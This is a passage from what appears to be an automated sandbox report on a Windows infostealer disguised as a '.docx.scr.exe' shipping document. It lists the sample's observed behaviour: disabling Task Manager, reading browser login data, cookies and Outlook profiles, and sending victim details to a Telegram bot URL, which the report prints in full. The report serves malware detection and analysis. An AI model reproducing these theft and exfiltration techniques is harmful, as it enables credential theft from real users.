                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Lowering of HIPS / PFW / Operating System Security Settings

                barindex
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeRegistry value created: DisableTaskMgr 1Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgrJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 00000003.00000002.4163850836.0000000003181000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4525db8.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4525db8.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4417178.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.449e798.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.4162240425.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1730714244.00000000041E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe PID: 1376, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe PID: 6644, type: MEMORYSTR
                Source: Yara matchFile source: 0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4525db8.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4525db8.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4417178.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.449e798.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.4162240425.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1730714244.00000000041E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe PID: 1376, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe PID: 6644, type: MEMORYSTR
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: Yara matchFile source: 0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4525db8.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4525db8.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.449e798.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4417178.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.4162240425.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1730714244.00000000041E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe PID: 1376, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe PID: 6644, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 00000003.00000002.4163850836.0000000003181000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4525db8.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4525db8.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4417178.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.449e798.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.4162240425.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1730714244.00000000041E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe PID: 1376, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe PID: 6644, type: MEMORYSTR
                Source: Yara matchFile source: 0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4525db8.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4525db8.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4417178.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.449e798.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.4162240425.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1730714244.00000000041E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe PID: 1376, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe PID: 6644, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                DLL Side-Loading
                111
                Process Injection
                1
                Masquerading
                1
                OS Credential Dumping
                1
                Query Registry
                Remote Services1
                Email Collection
                1
                Web Service
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                DLL Side-Loading
                31
                Disable or Modify Tools
                LSASS Memory1
                Security Software Discovery
                Remote Desktop Protocol1
                Archive Collected Data
                11
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
                Virtualization/Sandbox Evasion
                Security Account Manager1
                Process Discovery
                SMB/Windows Admin Shares1
                Data from Local System
                3
                Ingress Tool Transfer
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
                Process Injection
                NTDS31
                Virtualization/Sandbox Evasion
                Distributed Component Object ModelInput Capture3
                Non-Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script13
                Obfuscated Files or Information
                LSA Secrets1
                Application Window Discovery
                SSHKeylogging14
                Application Layer Protocol
                Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                Software Packing
                Cached Domain Credentials1
                System Network Configuration Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                DLL Side-Loading
                DCSync1
                File and Directory Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem13
                System Information Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1576530 Sample: HIROSHIMA STAR - VSL's_DETA... Startdate: 17/12/2024 Architecture: WINDOWS Score: 100 19 reallyfreegeoip.org 2->19 21 api.telegram.org 2->21 23 2 other IPs or domains 2->23 31 Found malware configuration 2->31 33 Malicious sample detected (through community Yara rule) 2->33 35 Antivirus / Scanner detection for submitted sample 2->35 41 11 other signatures 2->41 8 HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe 3 2->8         started        signatures3 37 Tries to detect the country of the analysis system (by using the IP) 19->37 39 Uses the Telegram API (likely for C&C communication) 21->39 process4 signatures5 43 Adds a directory exclusion to Windows Defender 8->43 45 Injects a PE file into a foreign processes 8->45 11 HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe 16 2 8->11         started        15 powershell.exe 7 8->15         started        process6 dnsIp7 25 api.telegram.org 149.154.167.220, 443, 49758 TELEGRAMRU United Kingdom 11->25 27 checkip.dyndns.com 193.122.130.0, 49733, 49738, 49740 ORACLE-BMC-31898US United States 11->27 29 reallyfreegeoip.org 104.21.67.152, 443, 49734, 49736 CLOUDFLARENETUS United States 11->29 47 Tries to steal Mail credentials (via file / registry access) 11->47 49 Tries to harvest and steal browser information (history, passwords, etc) 11->49 51 Disable Task Manager(disabletaskmgr) 11->51 53 Disables the Windows task manager (taskmgr) 11->53 17 conhost.exe 15->17         started        signatures8 process9

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe31%VirustotalBrowse
                HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe29%ReversingLabs
                HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe100%AviraHEUR/AGEN.1362915
                HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                NameIPActiveMaliciousAntivirus DetectionReputation
                reallyfreegeoip.org
                104.21.67.152
                truefalse
                  high
                  api.telegram.org
                  149.154.167.220
                  truefalse
                    high
                    checkip.dyndns.com
                    193.122.130.0
                    truefalse
                      high
                      checkip.dyndns.org
                      unknown
                      unknownfalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        https://reallyfreegeoip.org/xml/8.46.123.189false
                          high
                          http://checkip.dyndns.org/false
                            high
                            https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20and%20Time:%2018/12/2024%20/%2006:26:01%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20301389%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                              high
                              NameSourceMaliciousAntivirus DetectionReputation
                              http://www.fontbureau.com/designersGHIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://www.fontbureau.com/designers/?HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://www.founder.com.cn/cn/bTheHIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://api.telegram.orgHIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.0000000003266000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://api.telegram.org/botHIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1730714244.00000000041E4000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.0000000003266000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4162240425.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                        high
                                        http://www.fontbureau.com/designers?HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://www.office.com/lBHIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.0000000003370000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://www.tiro.comHIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://www.fontbureau.com/designersHIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.0000000004403000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.00000000042AD000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.00000000042D4000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.000000000425F000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.000000000328B000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.0000000004527000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.0000000004451000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
